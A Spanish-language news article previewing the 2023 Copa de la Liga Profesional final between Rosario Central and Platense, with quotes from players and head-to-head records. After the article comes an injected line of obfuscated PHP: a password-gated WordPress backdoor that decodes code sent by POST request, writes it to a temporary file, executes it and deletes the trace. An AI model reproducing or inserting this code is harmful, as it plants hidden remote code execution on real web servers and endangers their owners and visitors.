Rosario Central y Platense definirán esta noche al campeón de la Copa de la Liga Profesional

Rosario Central y Platense jugarán hoy, desde la 21 horas en el estadio Madre de Ciudades, den Santiago del Estero, la final de la Copa de la Liga Profesionoal 2023. Ambos arribaron a este partido decisivo tras imponerse en los desempates por penales en las semifinales con el gran lucimiento de sus arqueros, Jorge Broun y Ramiro Macagno.

El Canalla intentará romper una racha de 36 años sin títulos en primera división, desde su última coronación en temporada 1986-87, mientras que el Calamar buscará la primera consagración de su historia en la categoría máxima.

El ganador, además de adueñarse del título, obtendrá la clasificación directa a la próxima Copa Libertadores. Además, podrá competir por otra estrella: el viernes 22 de diciembre se enfrentará a River Plate por el Trofeo de Campeones.

El equipo de Martín Palermo viene de eliminar a Godoy Cruz por penales -cuatro atajó Macagno- y el conjunto de Miguel Ángel Russo viene de dejar afuera a River Plate también por penales -tres atajó Fatura Broun- y previamente, en cuartos de final, habían eliminado a Huracán y a Racing Club respectivamente.

En una conferencia de prensa previa a esta gran final, Broun aseguró que “De Miguel (Russo) no vamos a descubrir nada; él es el capitán de este barco. Desde el día uno se puso al mando y llevó adelante al equipo con su tranquilidad y su conocimiento”.

Gastón Susso, por su parte, declaró: “Sabemos que Central es un duro rival, pero nosotros estamos muy convencidos. Llegamos hasta acá merecidamente”.

El arquero de Rosario Central afirmó: “Consagrarse campeón con este club sería algo hermoso para todo el plantel, para la ciudad y para la gente que nos viene acompañando hace mucho tiempo y llenando todos los estadios”.

El marcador central de Platense dijo: “Para nosotros fue un año largo y duro porque estuvimos peleando el descenso; la fortaleza del grupo hizo que pudiéramos llegar hasta acá”.

El historial marca que en n el profesionalismo, jugaron 85 veces con 31 victorias para los rosarinos, 27 para Platense y 27 empates. El último partido fue por la fecha 15 de la fase de grupos de la Copa de la Liga y goleó Rosario Central 4-0, con goles de Ignacio Malcorra, de penal, Jaminton Campaz, Alejo Véliz y Tomás O´Connor. 

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}